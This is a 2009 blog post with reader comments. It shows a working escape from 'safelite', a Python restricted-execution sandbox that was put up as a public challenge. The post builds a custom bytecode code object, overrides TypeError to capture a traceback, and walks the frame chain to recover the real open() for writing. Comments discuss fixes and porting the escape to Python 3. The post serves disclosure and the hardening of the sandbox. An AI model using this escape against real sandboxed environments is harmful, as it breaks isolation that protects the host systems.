Monday, February 23, 2009

safelite exploit

Tav recently issued a challenge to get around the security of a module he made, intended to create a sort of restricted execution sandbox in the Python interpreter. Apparently if it can be made secure enough after lots of people look at it, then it could get included in the Python standard library.

That seems like a worthwhile thing to have available, to make uses like the Google App Engine more easily implemented and secured. It works (at least, the current version does) by trying to hide anything you could use from code to write to the local filesystem. You get a replacement function for file()/open() which only allows opening in read mode, and __import__(), execfile(), reload(), etc, are taken out of the builtins dictionary. So (hopefully) the user can not import anything at all.

To go further than that, tav removes the func_* attributes from the FunctionType dictionary- if you had func_closure, as an example, you would be able to inspect the closure attached to the replacement open() function and get at the real one. (My recipe on ASPN shows you one way to do that.) A few other attributes are removed from the dictionaries of default types, like gi_code on GeneratorType.

The replacement open() function is (now) carefully coded to avoid trusting any globals or the contents of the __builtins__ dictionary when it is run- otherwise, you'd be able to trick it into acting in different ways when it uses values from there.

I came up with an exploit which hinges on the continued presence of the compile() builtin in the sandbox. When you use compile(), you get a code object out. When you have a code object, you can create new code objects (using type(code_object)(arguments)). Since you can come up with arbitrary bytecode to put in a new code object, you can make the code object thus created do a few things that you can't do in normal python. The most useful one in this case is that you can get access to the traceback object from an exception without sys.exc_info() or sys.exc_traceback.

I won't go too far into details on that, except to say that when you get into an exception handler, the stack is topped with the exception object, as well as the traceback and type objects you'd get from sys.exc_info(). Roll a little custom bytecode, and you can store it off of the stack rather than throwing it away (which is what the compiler will usually do):

>>> f = type(lambda: 0)(type(compile('1', 'b', 'eval'
))(2, 2, 4, 67, 'y\x08\x00t\x00\x00\x01Wn\x09\x00\x01'
'\x01a\x00\x00n\x01\x00X|\x01\x00|\x00\x00\x83\x01\x00S',
(None,), ('stuff',), ('g', 'x'), 'q', 'f', 1, ''),
globals(), None, (TypeError,))
>>> dis.dis(f)
1 0 SETUP_EXCEPT 8 (to 11)
3 LOAD_GLOBAL 0 (stuff)
6 POP_TOP
7 POP_BLOCK
8 JUMP_FORWARD 9 (to 20)
>> 11 POP_TOP
12 POP_TOP
13 STORE_GLOBAL 0 (stuff)
16 JUMP_FORWARD 1 (to 20)
19 END_FINALLY
>> 20 LOAD_FAST 1 (x)
23 LOAD_FAST 0 (g)
26 CALL_FUNCTION 1
29 RETURN_VALUE


That function returns TypeError, because I need to get it to run underneath the replacement open() function, and the easiest way (there are others) is to overload TypeError- the only global that it references.

__builtins__.TypeError = f


I just call the replacement open() with a mode parameter of 2, so that it will load and call TypeError:

FileReader('foo', 2)


..whereupon it has kindly stored the traceback object in the global dict under the name "stuff". Traceback objects contain references to frame objects, and you can follow frame objects up the call chain, and so we can easily get to the frame containing the replacement open() function:

stuff.tb_frame.f_back


From that point, it's trivial to pull out the real open() function from the local variables of the frame, and use it:

stuff.tb_frame.f_back.f_locals['open_file']\
('w00t', 'w').write('yay\n')


That works in Python 2.4 through 2.6, and probably some earlier 2.x versions. I seriously doubt it works in 3.0, but I haven't tried, and it might be adaptable to work there.

What's the right approach to fixing this hole? I'm not sure. If tav decides to disallow compile(), I haven't yet found any other way to get at a code object, so that would plug it up as far as I know. On the other hand, it would be real nice to be able to keep compile(). Give the restricted-environment users as much power as possible without sacrificing security. If it is possible to remove f_back or f_locals or tb_frame from their respective builtin-type dictionaries, that would plug the hole, but would probably break the reporting and display of normal exception tracebacks.

Maybe Python can be made not to provide the traceback object in an exception handler's stack frame- I admit I don't even know why it does. Does it support some old, no-longer-documented syntax? That would plug up this hole without sacrificing any functionality that I know of, but there might remain some related exploits.

5 comments:

  1. Hey Paul,

    This is hardcore! After all that playing with Python, I never realised that one could get hold of a traceback object so easily.

    I fixed the TypeError hole, but that still leaves a decision to be made about whether to remove compile or tb_frame... I'm edging towards the latter...

    What do you think?

    ReplyDelete
  2. I'd love to keep compile() available if possible.

    ReplyDelete
  3. This works in py3k if you insert an extra 0 parameter as the second argument to the code object constructor, and change the code string and the final argument to be bytestrings, not unicode.

    ReplyDelete
  4. So this doesn't really affect the safelite approach, but it looks like the python compiler always produces code to throw away the traceback object from the stack when handling an exception. I am mystified as to why it gets put there at all.

    ReplyDelete
  5. this is probably the most hardcore thing i've ever seen

    ReplyDelete